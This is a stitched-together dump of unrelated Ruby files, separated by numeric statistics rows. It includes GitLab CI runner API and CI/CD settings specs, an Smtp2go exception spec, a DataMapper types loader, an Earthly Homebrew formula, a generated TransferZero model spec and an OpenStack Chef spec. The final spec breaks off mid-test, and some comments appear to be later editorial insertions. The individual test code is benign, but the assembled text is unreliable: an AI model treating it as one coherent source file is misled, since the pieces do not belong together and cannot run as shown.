let(:runner) { create(:ci_runner, :project, maximum_timeout: 1000, projects: [project]) }
it 'contains info about timeout overridden by runner' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1000 })
end
end
context 'when runner specifies bigger timeout' do
let(:runner) { create(:ci_runner, :project, maximum_timeout: 2000, projects: [project]) }
it 'contains info about timeout not overridden by runner' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1234 })
end
end
end
end
end
# Helper: POSTs a job request to the runner endpoint. Authenticates with
# the given token (defaults to the current runner's token); any extra
# keyword params are forwarded alongside token and last_update.
def request_job(token = runner.token, **params)
  payload = params.merge(token: token, last_update: last_update)
  agent_header = { 'User-Agent' => user_agent }
  post api('/jobs/request'), payload, agent_header
end
end
end
describe 'PUT /api/v4/jobs/:id' do
let(:job) { create(:ci_build, :pending, :trace_live, pipeline: pipeline, runner_id: runner.id) }
before do
job.run!
end
context 'when status is given' do
it 'mark job as succeeded' do
update_job(state: 'success')
job.reload
expect(job).to be_success
end
it 'mark job as failed' do
update_job(state: 'failed')
job.reload
expect(job).to be_failed
expect(job).to be_unknown_failure
end
context 'when failure_reason is script_failure' do
before do
update_job(state: 'failed', failure_reason: 'script_failure')
job.reload
end
it { expect(job).to be_script_failure }
end
context 'when failure_reason is runner_system_failure' do
before do
update_job(state: 'failed', failure_reason: 'runner_system_failure')
job.reload
end
it { expect(job).to be_runner_system_failure }
end
end
context 'when trace is given' do
it 'creates a trace artifact' do
allow(BuildFinishedWorker).to receive(:perform_async).with(job.id) do
ArchiveTraceWorker.new.perform(job.id)
end
update_job(state: 'success', trace: 'BUILD TRACE UPDATED')
job.reload
expect(response).to have_gitlab_http_status(200)
expect(job.trace.raw).to eq 'BUILD TRACE UPDATED'
expect(job.job_artifacts_trace.open.read).to eq 'BUILD TRACE UPDATED'
end
end
context 'when no trace is given' do
it 'does not override trace information' do
update_job
expect(job.reload.trace.raw).to eq 'BUILD TRACE'
end
context 'when running state is sent' do
it 'updates update_at value' do
expect { update_job_after_time }.to change { job.reload.updated_at }
end
end
context 'when other state is sent' do
it "doesn't update update_at value" do
expect { update_job_after_time(20.minutes, state: 'success') }.not_to change { job.reload.updated_at }
end
end
end
context 'when job has been erased' do
let(:job) { create(:ci_build, runner_id: runner.id, erased_at: Time.now) }
it 'responds with forbidden' do
update_job
expect(response).to have_gitlab_http_status(403)
end
end
context 'when job has already been finished' do
before do
job.trace.set('Job failed')
job.drop!(:script_failure)
end
it 'does not update job status and job trace' do
update_job(state: 'success', trace: 'BUILD TRACE UPDATED')
job.reload
expect(response).to have_gitlab_http_status(403)
expect(response.header['Job-Status']).to eq 'failed'
expect(job.trace.raw).to eq 'Job failed'
expect(job).to be_failed
end
end
# Helper: PUTs a state update for the current job, authenticating with
# the given token (defaults to the job's own token).
def update_job(token = job.token, **params)
  put api("/jobs/#{job.id}"), params.merge(token: token)
end
# Helper: re-issues an update for the job after simulating the passage of
# +update_interval+, so updated_at-related behaviour can be observed.
#
# +state+ is a keyword argument: the call site at this spec's
# `update_job_after_time(20.minutes, state: 'success')` previously hit a
# positional `state = 'running'` parameter, which silently captured the
# keyword as the hash `{ state: 'success' }` and sent that hash to the
# API instead of the plain string.
def update_job_after_time(update_interval = 20.minutes, state: 'running')
  Timecop.travel(job.updated_at + update_interval) do
    update_job(job.token, state: state)
  end
end
end
describe 'PATCH /api/v4/jobs/:id/trace' do
let(:job) { create(:ci_build, :running, :trace_live, runner_id: runner.id, pipeline: pipeline) }
let(:headers) { { API::Helpers::Runner::JOB_TOKEN_HEADER => job.token, 'Content-Type' => 'text/plain' } }
let(:headers_with_range) { headers.merge({ 'Content-Range' => '11-20' }) }
let(:update_interval) { 10.seconds.to_i }
before do
initial_patch_the_trace
end
context 'when request is valid' do
it 'gets correct response' do
expect(response.status).to eq 202
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
expect(response.header).to have_key 'Range'
expect(response.header).to have_key 'Job-Status'
end
context 'when job has been updated recently' do
it { expect { patch_the_trace }.not_to change { job.updated_at }}
it "changes the job's trace" do
patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when Runner makes a force-patch' do
it { expect { force_patch_the_trace }.not_to change { job.updated_at }}
it "doesn't change the build.trace" do
force_patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
end
end
end
context 'when job was not updated recently' do
let(:update_interval) { 15.minutes.to_i }
it { expect { patch_the_trace }.to change { job.updated_at } }
it 'changes the job.trace' do
patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when Runner makes a force-patch' do
it { expect { force_patch_the_trace }.to change { job.updated_at } }
it "doesn't change the job.trace" do
force_patch_the_trace
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
end
end
end
context 'when project for the build has been deleted' do
let(:job) do
create(:ci_build, :running, :trace_live, runner_id: runner.id, pipeline: pipeline) do |job|
job.project.update(pending_delete: true)
end
end
it 'responds with forbidden' do
expect(response.status).to eq(403)
end
end
context 'when trace is patched' do
before do
patch_the_trace
end
it 'has valid trace' do
expect(response.status).to eq(202)
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended'
end
context 'when job is cancelled' do
before do
job.cancel
end
context 'when trace is patched' do
before do
patch_the_trace
end
it 'returns Forbidden ' do
expect(response.status).to eq(403)
end
end
end
context 'when redis data are flushed' do
before do
redis_shared_state_cleanup!
end
it 'has empty trace' do
expect(job.reload.trace.raw).to eq ''
end
context 'when we perform partial patch' do
before do
patch_the_trace('hello', headers.merge({ 'Content-Range' => "28-32/5" }))
end
it 'returns an error' do
expect(response.status).to eq(416)
expect(response.header['Range']).to eq('0-0')
end
end
context 'when we resend full trace' do
before do
patch_the_trace('BUILD TRACE appended appended hello', headers.merge({ 'Content-Range' => "0-34/35" }))
end
it 'succeeds with updating trace' do
expect(response.status).to eq(202)
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended appended hello'
end
end
end
end
context 'when the job is canceled' do
before do
job.cancel
patch_the_trace
end
it 'receives status in header' do
expect(response.header['Job-Status']).to eq 'canceled'
end
end
end
context 'when Runner makes a force-patch' do
before do
force_patch_the_trace
end
it 'gets correct response' do
expect(response.status).to eq 202
expect(job.reload.trace.raw).to eq 'BUILD TRACE appended'
expect(response.header).to have_key 'Range'
expect(response.header).to have_key 'Job-Status'
end
end
context 'when content-range start is too big' do
let(:headers_with_range) { headers.merge({ 'Content-Range' => '15-20/6' }) }
it 'gets 416 error response with range headers' do
expect(response.status).to eq 416
expect(response.header).to have_key 'Range'
expect(response.header['Range']).to eq '0-11'
end
end
context 'when content-range start is too small' do
let(:headers_with_range) { headers.merge({ 'Content-Range' => '8-20/13' }) }
it 'gets 416 error response with range headers' do
expect(response.status).to eq 416
expect(response.header).to have_key 'Range'
expect(response.header['Range']).to eq '0-11'
end
end
context 'when Content-Range header is missing' do
let(:headers_with_range) { headers }
it { expect(response.status).to eq 400 }
end
# Description typo fixed: "errased" -> "erased", matching the sibling
# contexts for erased jobs elsewhere in this spec.
context 'when job has been erased' do
  let(:job) { create(:ci_build, runner_id: runner.id, erased_at: Time.now) }

  it { expect(response.status).to eq 403 }
end
# Helper: PATCHes a chunk onto the job trace. When no explicit headers
# are supplied, a Content-Range header is computed from the current
# trace size so the chunk is appended at the end. The clock is advanced
# by update_interval so updated_at-related behaviour can be observed.
def patch_the_trace(content = ' appended', request_headers = nil)
  unless request_headers
    job.trace.read do |stream|
      # Range is inclusive: offset..(offset + content length - 1).
      offset = stream.size
      limit = offset + content.length - 1
      request_headers = headers.merge({ 'Content-Range' => "#{offset}-#{limit}" })
    end
  end

  Timecop.travel(job.updated_at + update_interval) do
    patch api("/jobs/#{job.id}/trace"), content, request_headers
    job.reload
  end
end
# Helper: seeds the trace with the first appended chunk, using the
# explicit Content-Range headers defined by the surrounding group.
def initial_patch_the_trace
  patch_the_trace(' appended', headers_with_range)
end
# Helper: sends the same empty trace chunk twice; repeating the range
# exercises the server's force-patch handling.
def force_patch_the_trace
  2.times do
    patch_the_trace('')
  end
end
end
describe 'artifacts' do
let(:job) { create(:ci_build, :pending, pipeline: pipeline, runner_id: runner.id) }
let(:jwt_token) { JWT.encode({ 'iss' => 'gitlab-workhorse' }, Gitlab::Workhorse.secret, 'HS256') }
let(:headers) { { 'GitLab-Workhorse' => '1.0', Gitlab::Workhorse::INTERNAL_API_REQUEST_HEADER => jwt_token } }
let(:headers_with_token) { headers.merge(API::Helpers::Runner::JOB_TOKEN_HEADER => job.token) }
let(:file_upload) { fixture_file_upload('spec/fixtures/banana_sample.gif', 'image/gif') }
let(:file_upload2) { fixture_file_upload('spec/fixtures/dk.png', 'image/gif') }
before do
stub_artifacts_object_storage
job.run!
end
describe 'POST /api/v4/jobs/:id/artifacts/authorize' do
context 'when using token as parameter' do
context 'posting artifacts to running job' do
subject do
authorize_artifacts_with_token_in_params
end
shared_examples 'authorizes local file' do
it 'succeeds' do
subject
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).to eq(JobArtifactUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to be_nil
end
end
context 'when using local storage' do
it_behaves_like 'authorizes local file'
end
context 'when using remote storage' do
context 'when direct upload is enabled' do
before do
stub_artifacts_object_storage(enabled: true, direct_upload: true)
end
it 'succeeds' do
subject
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).to eq(JobArtifactUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to have_key('ID')
expect(json_response['RemoteObject']).to have_key('GetURL')
expect(json_response['RemoteObject']).to have_key('StoreURL')
expect(json_response['RemoteObject']).to have_key('DeleteURL')
expect(json_response['RemoteObject']).to have_key('MultipartUpload')
end
end
context 'when direct upload is disabled' do
before do
stub_artifacts_object_storage(enabled: true, direct_upload: false)
end
it_behaves_like 'authorizes local file'
end
end
end
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
authorize_artifacts_with_token_in_params(filesize: 100)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when using token as header' do
it 'authorizes posting artifacts to running job' do
authorize_artifacts_with_token_in_headers
expect(response).to have_gitlab_http_status(200)
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
expect(json_response['TempPath']).not_to be_nil
end
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
authorize_artifacts_with_token_in_headers(filesize: 100)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when using runners token' do
it 'fails to authorize artifacts posting' do
authorize_artifacts(token: job.project.runners_token)
expect(response).to have_gitlab_http_status(403)
end
end
it 'reject requests that did not go through gitlab-workhorse' do
headers.delete(Gitlab::Workhorse::INTERNAL_API_REQUEST_HEADER)
authorize_artifacts
expect(response).to have_gitlab_http_status(500)
end
context 'authorization token is invalid' do
it 'responds with forbidden' do
authorize_artifacts(token: 'invalid', filesize: 100 )
expect(response).to have_gitlab_http_status(403)
end
end
# Helper: POSTs to the artifacts authorize endpoint with the given
# params and headers.
def authorize_artifacts(params = {}, request_headers = headers)
  post api("/jobs/#{job.id}/artifacts/authorize"), params, request_headers
end

# Variant that authenticates by placing the job token in the params.
def authorize_artifacts_with_token_in_params(params = {}, request_headers = headers)
  authorize_artifacts(params.merge(token: job.token), request_headers)
end

# Variant that authenticates via the JOB_TOKEN_HEADER request header.
def authorize_artifacts_with_token_in_headers(params = {}, request_headers = headers_with_token)
  authorize_artifacts(params, request_headers)
end
end
describe 'POST /api/v4/jobs/:id/artifacts' do
context 'when artifacts are being stored inside of tmp path' do
before do
# by configuring this path we allow to pass temp file from any path
allow(JobArtifactUploader).to receive(:workhorse_upload_path).and_return('/')
end
context 'when job has been erased' do
let(:job) { create(:ci_build, erased_at: Time.now) }
before do
upload_artifacts(file_upload, headers_with_token)
end
it 'responds with forbidden' do
upload_artifacts(file_upload, headers_with_token)
expect(response).to have_gitlab_http_status(403)
end
end
context 'when job is running' do
shared_examples 'successful artifacts upload' do
it 'updates successfully' do
expect(response).to have_gitlab_http_status(201)
end
end
context 'when uses accelerated file post' do
context 'for file stored locally' do
before do
upload_artifacts(file_upload, headers_with_token)
end
it_behaves_like 'successful artifacts upload'
end
context 'for file stored remotelly' do
let!(:fog_connection) do
stub_artifacts_object_storage(direct_upload: true)
end
before do
fog_connection.directories.get('artifacts').files.create(
key: 'tmp/uploads/12312300',
body: 'content'
)
upload_artifacts(file_upload, headers_with_token,
{ 'file.remote_id' => remote_id })
end
context 'when valid remote_id is used' do
let(:remote_id) { '12312300' }
it_behaves_like 'successful artifacts upload'
end
context 'when invalid remote_id is used' do
let(:remote_id) { 'invalid id' }
it 'responds with bad request' do
expect(response).to have_gitlab_http_status(500)
expect(json_response['message']).to eq("Missing file")
end
end
end
end
context 'when using runners token' do
it 'responds with forbidden' do
upload_artifacts(file_upload, headers.merge(API::Helpers::Runner::JOB_TOKEN_HEADER => job.project.runners_token))
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when artifacts file is too large' do
it 'fails to post too large artifact' do
stub_application_setting(max_artifacts_size: 0)
upload_artifacts(file_upload, headers_with_token)
expect(response).to have_gitlab_http_status(413)
end
end
context 'when artifacts post request does not contain file' do
it 'fails to post artifacts without file' do
post api("/jobs/#{job.id}/artifacts"), {}, headers_with_token
expect(response).to have_gitlab_http_status(400)
end
end
context 'GitLab Workhorse is not configured' do
it 'fails to post artifacts without GitLab-Workhorse' do
post api("/jobs/#{job.id}/artifacts"), { token: job.token }, {}
expect(response).to have_gitlab_http_status(403)
end
end
context 'when setting an expire date' do
let(:default_artifacts_expire_in) {}
let(:post_data) do
{ 'file.path' => file_upload.path,
'file.name' => file_upload.original_filename,
'expire_in' => expire_in }
end
before do
stub_application_setting(default_artifacts_expire_in: default_artifacts_expire_in)
post(api("/jobs/#{job.id}/artifacts"), post_data, headers_with_token)
end
context 'when an expire_in is given' do
let(:expire_in) { '7 days' }
it 'updates when specified' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_within(5.minutes).of(7.days.from_now)
end
end
context 'when no expire_in is given' do
let(:expire_in) { nil }
it 'ignores if not specified' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_nil
end
context 'with application default' do
context 'when default is 5 days' do
let(:default_artifacts_expire_in) { '5 days' }
it 'sets to application default' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_within(5.minutes).of(5.days.from_now)
end
end
context 'when default is 0' do
let(:default_artifacts_expire_in) { '0' }
it 'does not set expire_in' do
expect(response).to have_gitlab_http_status(201)
expect(job.reload.artifacts_expire_at).to be_nil
end
end
end
end
end
context 'posts artifacts file and metadata file' do
let!(:artifacts) { file_upload }
let!(:artifacts_sha256) { Digest::SHA256.file(artifacts.path).hexdigest }
let!(:metadata) { file_upload2 }
let!(:metadata_sha256) { Digest::SHA256.file(metadata.path).hexdigest }
let(:stored_artifacts_file) { job.reload.artifacts_file.file }
let(:stored_metadata_file) { job.reload.artifacts_metadata.file }
let(:stored_artifacts_size) { job.reload.artifacts_size }
let(:stored_artifacts_sha256) { job.reload.job_artifacts_archive.file_sha256 }
let(:stored_metadata_sha256) { job.reload.job_artifacts_metadata.file_sha256 }
before do
post(api("/jobs/#{job.id}/artifacts"), post_data, headers_with_token)
end
context 'when posts data accelerated by workhorse is correct' do
let(:post_data) do
{ 'file.path' => artifacts.path,
'file.name' => artifacts.original_filename,
'file.sha256' => artifacts_sha256,
'metadata.path' => metadata.path,
'metadata.name' => metadata.original_filename,
'metadata.sha256' => metadata_sha256 }
end
it 'stores artifacts and artifacts metadata' do
expect(response).to have_gitlab_http_status(201)
expect(stored_artifacts_file.original_filename).to eq(artifacts.original_filename)
expect(stored_metadata_file.original_filename).to eq(metadata.original_filename)
expect(stored_artifacts_size).to eq(72821)
expect(stored_artifacts_sha256).to eq(artifacts_sha256)
expect(stored_metadata_sha256).to eq(metadata_sha256)
end
end
context 'when there is no artifacts file in post data' do
let(:post_data) do
{ 'metadata' => metadata }
end
it 'is expected to respond with bad request' do
expect(response).to have_gitlab_http_status(400)
end
it 'does not store metadata' do
expect(stored_metadata_file).to be_nil
end
end
end
end
context 'when artifacts are being stored outside of tmp path' do
let(:new_tmpdir) { Dir.mktmpdir }
before do
# init before overwriting tmp dir
file_upload
# by configuring this path we allow to pass file from @tmpdir only
# but all temporary files are stored in system tmp directory
allow(Dir).to receive(:tmpdir).and_return(new_tmpdir)
end
after do
FileUtils.remove_entry(new_tmpdir)
end
# Fixed malformed example declaration: the original read
# `it' "…"' do`, i.e. the quote was glued to `it` and the description
# was wrapped in stray literal quotes and a leading space.
it 'fails to post artifacts for outside of tmp path' do
  upload_artifacts(file_upload, headers_with_token)

  expect(response).to have_gitlab_http_status(400)
end
end
# Helper: POSTs an artifact upload in the workhorse-accelerated form,
# passing the temp file's path and original filename as `file.*` params.
def upload_artifacts(file, headers = {}, params = {})
  file_params = {
    'file.path' => file.path,
    'file.name' => file.original_filename
  }
  post api("/jobs/#{job.id}/artifacts"), params.merge(file_params), headers
end
end
describe 'GET /api/v4/jobs/:id/artifacts' do
let(:token) { job.token }
context 'when job has artifacts' do
let(:job) { create(:ci_build) }
let(:store) { JobArtifactUploader::Store::LOCAL }
before do
create(:ci_job_artifact, :archive, file_store: store, job: job)
end
context 'when using job token' do
context 'when artifacts are stored locally' do
let(:download_headers) do
{ 'Content-Transfer-Encoding' => 'binary',
'Content-Disposition' => 'attachment; filename=ci_build_artifacts.zip' }
end
before do
download_artifact
end
it 'download artifacts' do
expect(response).to have_http_status(200)
expect(response.headers.to_h).to include download_headers
end
end
context 'when artifacts are stored remotely' do
let(:store) { JobArtifactUploader::Store::REMOTE }
let!(:job) { create(:ci_build) }
context 'when proxy download is being used' do
before do
download_artifact(direct_download: false)
end
it 'uses workhorse send-url' do
expect(response).to have_gitlab_http_status(200)
expect(response.headers.to_h).to include(
'Gitlab-Workhorse-Send-Data' => /send-url:/)
end
end
context 'when direct download is being used' do
before do
download_artifact(direct_download: true)
end
it 'receive redirect for downloading artifacts' do
expect(response).to have_gitlab_http_status(302)
expect(response.headers).to include('Location')
end
end
end
end
# Description typo fixed: "runnners" -> "runners", matching the sibling
# "when using runners token" contexts elsewhere in this spec.
context 'when using runners token' do
  let(:token) { job.project.runners_token }

  before do
    download_artifact
  end

  it 'responds with forbidden' do
    expect(response).to have_gitlab_http_status(403)
  end
end
end
context 'when job does not has artifacts' do
it 'responds with not found' do
download_artifact
expect(response).to have_gitlab_http_status(404)
end
end
# Helper: GETs the job's artifacts archive, authenticating with the
# `token` let-binding of the surrounding group.
def download_artifact(params = {}, request_headers = headers)
  job.reload
  get api("/jobs/#{job.id}/artifacts"), params.merge(token: token), request_headers
end
end
end
end
end
| 35.398448 | 129 | 0.565874 |
ac09e7da9255dfb71210eaf4b6274002afa893e3 | 705 | require 'spec_helper'
# Root error class of the library; the concrete errors below subclass it
# so callers can rescue Smtp2goBaseException to catch everything.
describe Smtp2go::Smtp2goBaseException do
  it { expect(described_class).to be Smtp2go::Smtp2goBaseException }
end

describe Smtp2go::Smtp2goAPIKeyException do
  it { expect(described_class).to be < Smtp2go::Smtp2goBaseException }

  # The message should point users at the missing environment variable.
  it "raises a salient exception message" do
    exception = described_class.new
    expect(exception.message).to include(
      'SMTP2GO_API_KEY', 'Environment Variable')
  end
end

describe Smtp2go::Smtp2goParameterException do
  it { expect(described_class).to be < Smtp2go::Smtp2goBaseException }

  # The message should name the missing payload parameters.
  it "raises a salient exception message" do
    exception = described_class.new
    expect(exception.message).to include('html', 'text')
  end
end
| 28.2 | 70 | 0.764539 |
870c3093ac5dba6e62cf5582547473dfd65256ca | 397 | dir = Pathname(__FILE__).dirname.expand_path / 'types'
require dir / 'boolean'
require dir / 'discriminator'
require dir / 'text'
require dir / 'paranoid_datetime'
require dir / 'paranoid_boolean'
require dir / 'object'
require dir / 'serial'
# Short alias for the types namespace, defined only if the application
# has not already claimed the DM constant.
unless defined?(DM)
  DM = DataMapper::Types
end

# Mix the type constants into every DataMapper::Resource so models can
# reference them without the full namespace.
module DataMapper
  module Resource
    include Types
  end # module Resource
end # module DataMapper
| 19.85 | 54 | 0.740554 |
e88de652373157c6be597c03c2634185d58c39a8 | 2,081 | class Earthly < Formula
desc "Build automation tool for the container era"
homepage "https://earthly.dev/"
url "https://github.com/earthly/earthly/archive/v0.5.17.tar.gz"
sha256 "1dcc56b419413480fa2e116606cab2c8003483e0b8052443aa7b7da0572ce47f"
license "BUSL-1.1"
head "https://github.com/earthly/earthly.git"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "6ced4b644da7733596ddb225d4d07dddcdf3cea9975a1dcdce724e65093142fb"
sha256 cellar: :any_skip_relocation, big_sur: "45b1406d85fbc167590873e727dd63624ed17bceadc289bb4c6c7f8e8a669317"
sha256 cellar: :any_skip_relocation, catalina: "16c593502fd9a7270edab13a2ed8c9ca44486eb90bc97dceef99ec8c092ddadf"
sha256 cellar: :any_skip_relocation, mojave: "a9a09599ccebca0c987ea802cfc861097055ab2662db97c417bfeb83756fdb90"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e3b8af702a1afbb4ec9e795dc1f7f51421938a57378488764463b279cb26afb3" # linuxbrew-core
end
disable! date: "2021-07-15", because: "has an incompatible license"
depends_on "go" => :build
# Builds the earthly CLI with Go, embedding the default buildkitd image,
# version and git SHA via -ldflags and enabling the Dockerfile feature
# build tags, then runs the freshly built binary's own `bootstrap`
# command to generate and install bash/zsh completions.
def install
  ldflags = "-X main.DefaultBuildkitdImage=earthly/buildkitd:v#{version} -X main.Version=v#{version} " \
            "-X main.GitSha=bdeda2542465cb0bc0c8985a905aa2e3579a3f7b "
  tags = "dfrunmount dfrunsecurity dfsecrets dfssh dfrunnetwork"
  system "go", "build",
         "-tags", tags,
         "-ldflags", ldflags,
         *std_go_args,
         "./cmd/earthly/main.go"

  bash_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "bash")
  (bash_completion/"earthly").write bash_output
  zsh_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "zsh")
  (zsh_completion/"_earthly").write zsh_output
end
test do
  (testpath/"build.earthly").write <<~EOS
    default:
    \tRUN echo Homebrew
  EOS

  # No buildkitd daemon is reachable in the test environment, so the
  # build is expected to exit with status 6; matching the error output
  # still proves the binary runs and parses the Earthfile.
  output = shell_output("#{bin}/earthly --buildkit-host 127.0.0.1 +default 2>&1", 6).strip
  assert_match "buildkitd failed to start", output
end
end
| 39.264151 | 139 | 0.730899 |
ac064157ed461ce5b3111467e1e88929b9e6c24b | 2,314 | =begin
#TransferZero API
#Reference documentation for the TransferZero API V1
OpenAPI spec version: 1.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-beta3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TransferZero::PoliticallyExposedPerson
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
# Auto-generated smoke spec for the PoliticallyExposedPerson model: it
# verifies the class instantiates and stubs out one pending example per
# attribute for maintainers to fill in.
describe 'PoliticallyExposedPerson' do
  before do
    # run before each test
    @instance = TransferZero::PoliticallyExposedPerson.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of PoliticallyExposedPerson' do
    it 'should create an instance of PoliticallyExposedPerson' do
      expect(@instance).to be_instance_of(TransferZero::PoliticallyExposedPerson)
    end
  end

  describe 'test attribute "id"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "name"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "position"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "started_date"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "ended_date"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "sender_id"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "created_at"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "updated_at"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
| 27.547619 | 102 | 0.724287 |
035d50c960935fb8f7bef09380b31693e780bd4a | 1,376 | require_relative 'spec_helper'
# ChefSpec coverage for the plugin_config recipe: with two plugins
# (ml2 and openvswitch) configured via node attributes, the recipe must
# create each plugin directory and render each plugin's ini file with
# the attribute-driven section content.
describe 'openstack-network::plugin_config' do
  describe 'ubuntu' do
    let(:runner) { ChefSpec::SoloRunner.new(UBUNTU_OPTS) }
    let(:node) { runner.node }

    cached(:chef_run) do
      # Configure a minimal ml2 plugin with one section/key pair.
      node.override['openstack']['network']['plugins']['ml2'].tap do |ml2|
        ml2['path'] = '/etc/neutron/more_plugins'
        ml2['filename'] = 'ml2_conf.ini'
        ml2['conf'].tap do |conf|
          conf['section']['key'] = 'value'
        end
      end
      # And a second plugin (openvswitch) under a different path.
      node.override['openstack']['network']['plugins']['openvswitch'].tap do |ovs|
        ovs['path'] = '/etc/neutron/plugins/'
        ovs['filename'] = 'openvswitch_conf.ini'
        ovs['conf'].tap do |conf|
          conf['section']['key'] = 'value'
        end
      end
      runner.converge(described_recipe)
    end

    %w(/etc/neutron/more_plugins /etc/neutron/plugins/).each do |dir|
      it do
        expect(chef_run).to create_directory(dir)
          .with(
            recursive: true,
            owner: 'neutron',
            group: 'neutron',
            mode: '700'
          )
      end

      %w(ml2_conf.ini openvswitch_conf.ini).each do |conf|
        let(:file) { chef_run.template(File.join(dir, conf)) }
        it do
          expect(chef_run).to render_config_file(file.name).with_section_content('section', 'key = value')
        end
      end
    end
  end
end
| 30.577778 | 106 | 0.574128 |
d50f1aa1dd8bb3c8e0acf919b829cf12547fb6af | 10,772 | # frozen_string_literal: true
require('spec_helper')
RSpec.describe Projects::Settings::CiCdController do
let_it_be(:user) { create(:user) }
let_it_be(:project_auto_devops) { create(:project_auto_devops) }
let(:project) { project_auto_devops.project }
before do
project.add_maintainer(user)
sign_in(user)
end
# CI/CD settings page: renders for maintainers, 404s when the project's
# CI/CD feature is disabled, lists only assignable project runners, and
# stays at a constant query count regardless of runner tag counts.
describe 'GET show' do
  let_it_be(:parent_group) { create(:group) }
  let_it_be(:group) { create(:group, parent: parent_group) }
  let_it_be(:other_project) { create(:project, group: group) }

  it 'renders show with 200 status code' do
    get :show, params: { namespace_id: project.namespace, project_id: project }

    expect(response).to have_gitlab_http_status(:ok)
    expect(response).to render_template(:show)
  end

  context 'with CI/CD disabled' do
    before do
      project.project_feature.update_attribute(:builds_access_level, ProjectFeature::DISABLED)
    end

    it 'renders show with 404 status code' do
      get :show, params: { namespace_id: project.namespace, project_id: project }

      expect(response).to have_gitlab_http_status(:not_found)
    end
  end

  context 'with group runners' do
    let_it_be(:group_runner) { create(:ci_runner, :group, groups: [group]) }
    let_it_be(:project_runner) { create(:ci_runner, :project, projects: [other_project]) }
    let_it_be(:shared_runner) { create(:ci_runner, :instance) }

    it 'sets assignable project runners only' do
      group.add_maintainer(user)

      get :show, params: { namespace_id: project.namespace, project_id: project }

      expect(assigns(:assignable_runners)).to contain_exactly(project_runner)
    end
  end

  context 'prevents N+1 queries for tags' do
    render_views

    # Issues the request under test; extracted so it can be called for
    # warmup, for recording the control, and for the comparison run.
    def show
      get :show, params: { namespace_id: project.namespace, project_id: project }
    end

    it 'has the same number of queries with one tag or with many tags', :request_store do
      group.add_maintainer(user)

      show # warmup

      # with one tag
      create(:ci_runner, :instance, tag_list: %w(shared_runner))
      create(:ci_runner, :project, projects: [other_project], tag_list: %w(project_runner))
      create(:ci_runner, :group, groups: [group], tag_list: %w(group_runner))
      control = ActiveRecord::QueryRecorder.new { show }

      # with several tags
      create(:ci_runner, :instance, tag_list: %w(shared_runner tag2 tag3))
      create(:ci_runner, :project, projects: [other_project], tag_list: %w(project_runner tag2 tag3))
      create(:ci_runner, :group, groups: [group], tag_list: %w(group_runner tag2 tag3))

      expect { show }.not_to exceed_query_limit(control)
    end
  end
end
describe '#reset_cache' do
before do
sign_in(user)
project.add_maintainer(user)
allow(ResetProjectCacheService).to receive_message_chain(:new, :execute).and_return(true)
end
subject { post :reset_cache, params: { namespace_id: project.namespace, project_id: project }, format: :json }
it 'calls reset project cache service' do
expect(ResetProjectCacheService).to receive_message_chain(:new, :execute)
subject
end
context 'when service returns successfully' do
it 'returns a success header' do
subject
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when service does not return successfully' do
before do
allow(ResetProjectCacheService).to receive_message_chain(:new, :execute).and_return(false)
end
it 'returns an error header' do
subject
expect(response).to have_gitlab_http_status(:bad_request)
end
end
end
describe 'PUT #reset_registration_token' do
subject { put :reset_registration_token, params: { namespace_id: project.namespace, project_id: project } }
it 'resets runner registration token' do
expect { subject }.to change { project.reload.runners_token }
